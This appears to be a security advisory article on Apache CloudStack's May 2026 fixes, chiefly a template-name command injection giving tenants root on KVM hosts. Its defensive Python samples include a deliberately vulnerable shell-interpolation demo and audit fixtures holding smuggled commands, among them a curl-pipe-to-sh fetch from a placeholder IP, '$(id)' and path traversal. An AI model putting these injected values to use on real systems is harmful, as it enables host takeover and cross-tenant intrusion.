Apache CloudStack pushed two emergency LTS releases on May 8, 2026 — 4.20.3.0 and 4.22.0.1 — that close a cluster of seven security defects across the orchestrator, its backup plugin, the MinIO object storage integration, the new Proxmox extension, and the resource-quota path. The fix that matters most is for CVE-2026-25077, a template-registration flaw that lets any authenticated CloudStack account user execute code on the underlying KVM hypervisor host.
What happened
CloudStack lets account users register VM templates that are downloaded directly to primary storage for KVM deployments. The download path does not sanitize the supplied template file name. An attacker with a normal CloudStack account can register a template whose name contains shell metacharacters or path components, and when the management server stages it to a KVM host the unsanitized name is interpolated into a host-side command, executing arbitrary code as the user that runs the KVM agent — typically root.
The Apache advisory characterizes the impact as a full compromise of “resource integrity and confidentiality, data loss, denial of service, and availability of the KVM-based infrastructure managed by CloudStack.” In practical terms: a low-privileged tenant gets a root shell on the box hosting the cluster’s VMs. From there, attackers can read every neighbor tenant’s disks, modify libvirt config, drop persistence in /etc, and pivot into the management plane.
CVE-2026-25077 is filed as CWE-94 (Improper Control of Generation of Code) and was published 2026-05-08.
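To make the bug class concrete, here is an added illustration in Python. It is not CloudStack's code (the KVM agent is Java), and the function names, the allowlist pattern and the use of echo as a stand-in for the real copy tooling are all assumptions. The vulnerable variant interpolates the caller-controlled template name into a shell string; the hardened variant validates against a strict allowlist and passes the name as a single argv element so no shell ever parses it.

```python
import re
import subprocess

# Constructed sample template names (not taken from any real registration).
BENIGN_NAME = "ubuntu-24.04-cloudimg"
HOSTILE_NAME = "ubuntu; echo INJECTED"
TRAVERSAL_NAME = "../../etc/cron.d/backdoor"

# Hypothetical allowlist: alphanumeric start, then a bounded set of safe
# characters. No slashes, no whitespace, no shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def stage_template_vulnerable(name: str) -> str:
    """The bug class, not CloudStack's code: a caller-supplied name is
    interpolated into a shell command string and handed to /bin/sh.
    'echo' stands in for the real copy/convert tooling so the demo is
    harmless, but anything after a ';' in the name runs as its own command."""
    cmd = f"echo staging {name} to /var/lib/libvirt/images"
    result = subprocess.run(["/bin/sh", "-c", cmd],
                            capture_output=True, text=True, check=False)
    return result.stdout


def is_safe_name(name: str) -> bool:
    """True only if the whole name matches the allowlist."""
    return SAFE_NAME.fullmatch(name) is not None


def stage_template_hardened(name: str) -> str:
    """Validate first, then pass the name as one argv element.  A rejected
    name raises before anything reaches the host-side tooling."""
    if not is_safe_name(name):
        raise ValueError(f"rejected template name: {name!r}")
    result = subprocess.run(
        ["echo", "staging", name, "to", "/var/lib/libvirt/images"],
        capture_output=True, text=True, check=True)
    return result.stdout


def hardened_rejects(name: str) -> bool:
    """Helper for checking the reject path without a try/except at call sites."""
    try:
        stage_template_hardened(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The second line of this output is the injected command's result.
    print(stage_template_vulnerable(HOSTILE_NAME), end="")
    for candidate in (BENIGN_NAME, HOSTILE_NAME, TRAVERSAL_NAME):
        try:
            print(stage_template_hardened(candidate), end="")
        except ValueError as err:
            print(err)
```

Both halves of the fix matter: the argv list alone stops the shell from splitting on the semicolon, but a traversal name such as the third sample would still become a path argument, so the name that reaches the host must be validated (or better, generated server-side, e.g. a UUID) rather than taken from the user's string.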
What else is in the release
The same LTS bump fixes the remaining issues, which are individually less severe but matter together:
- Backup plugin cross-tenant disclosure (4.21.0.0, 4.22.0.0): Improper authorization on the backup API lets any authenticated user list backups belonging to any other account in the environment.
- MinIO bucket policy carryover: Bucket deletion does not purge the associated MinIO policy. A second user who later creates a bucket with the same name inherits the old policy and any access it granted.
- Resource-quota TOCTOU race: Multiple time-of-check / time-of-use races in the resource counting logic let a tenant exceed configured CPU, memory, and storage caps, with obvious DoS implications against shared infrastructure.
- Proxmox extension cross-tenant access: The Proxmox integration honors a user-editable proxmox_vmid setting without verifying tenant ownership, so an attacker can reference and manipulate VMs that belong to another account.
- External-integration policy weaknesses: The advisory cites additional security-policy handling weaknesses in the external-integration surface; review the upstream notes if you run the new external workload connectors.
Who is affected
If you operate any version of Apache CloudStack with KVM hypervisor hosts and you allow account users to register templates (the default), you are exposed to CVE-2026-25077. The backup, MinIO, and Proxmox issues apply selectively to 4.21.0.0 and 4.22.0.0, but the template flaw cuts across the supported tree.
CloudStack is widely deployed by hosters, telcos, and on-prem private cloud builds — the kind of environments where multi-tenant isolation is the entire point. A tenant-to-host escape is the worst-case outcome for that architecture.
What to do right now
- Upgrade. Move to 4.20.3.0 (LTS) or 4.22.0.1. The Apache project and ShapeBlue both publish release notes; the upgrade order is the management server first, then the KVM agents.
- Until you patch, disable user template registration. Restrict template registration to admin accounts, or quarantine the KVM zones from untrusted tenants.
- Audit recent template registrations. Any template name containing shell metacharacters (semicolons, backticks, $( ) or directory-traversal sequences is suspicious. Look in the management-server DB (vm_template table) and on KVM hosts for unexpected files in the secondary/primary storage staging paths.
- Rotate credentials reachable from a compromised KVM host: libvirt credentials, any cluster service accounts staged on the host, and any SSH keys present in the agent runtime.
- If you run the Proxmox extension or the backup plugin on 4.21/4.22, treat those as separately exploitable and re-audit cross-tenant API logs.
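A starting point for the template-name audit above, written here as an added example rather than anything shipped with CloudStack: the rows are constructed stand-ins for a query over the vm_template table, the column names are an assumption to adapt to your schema, and the indicator list is a practitioner's denylist rather than an upstream definition of what the bug accepts.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class TemplateRow:
    id: int
    account_id: int
    name: str


# Constructed stand-in for something like
#   SELECT id, account_id, name FROM vm_template WHERE created > <patch window>;
# (column names are an assumption; none of these rows come from a real system)
SAMPLE_ROWS = [
    TemplateRow(201, 2, "ubuntu-24.04-cloudimg"),
    TemplateRow(202, 7, "centos-stream-9; curl http://198.51.100.23/x | sh"),
    TemplateRow(203, 7, "../../etc/cron.d/payload"),
    TemplateRow(204, 3, "Windows Server 2022"),
    TemplateRow(205, 9, "$(id)-win10"),
    TemplateRow(206, 9, "--rootfs-type=raw"),
]

# Indicators, each labelled so the report says why a row was flagged.
# Plain spaces are deliberately not flagged: legitimate names contain them.
CHECKS = [
    ("shell-metachar", re.compile(r"""[;&|`$<>(){}"'\\*?\[\]]""")),
    ("path-traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("path-separator", re.compile(r"[\\/]")),
    ("leading-dash", re.compile(r"^-")),  # may be parsed as an option flag
    ("control-char", re.compile(r"[\x00-\x1f\x7f]")),
]


def classify_name(name: str) -> list[str]:
    """Labels of every indicator that fires on this template name."""
    return [label for label, rx in CHECKS if rx.search(name)]


def audit_templates(rows):
    """(id, account_id, name, reasons) for each row with at least one hit."""
    hits = []
    for row in rows:
        reasons = classify_name(row.name)
        if reasons:
            hits.append((row.id, row.account_id, row.name, reasons))
    return hits


def accounts_to_review(rows):
    """Accounts that registered a flagged template, for correlation against
    API logs and for deciding whose VMs to treat as hostile until cleared."""
    return sorted({acct for _, acct, _, _ in audit_templates(rows)})


if __name__ == "__main__":
    for tid, acct, name, reasons in audit_templates(SAMPLE_ROWS):
        print(f"template {tid} (account {acct}) {name!r}: {', '.join(reasons)}")
    print("accounts to review:", accounts_to_review(SAMPLE_ROWS))
```

Run it against an export of the real rows rather than the sample list; a hit is a reason to pull the account's full API history and to inspect the KVM hosts that could have staged the template, not proof of compromise on its own. Legitimate names with slashes or a leading dash will show up as well, which is the intended trade-off for an audit pass.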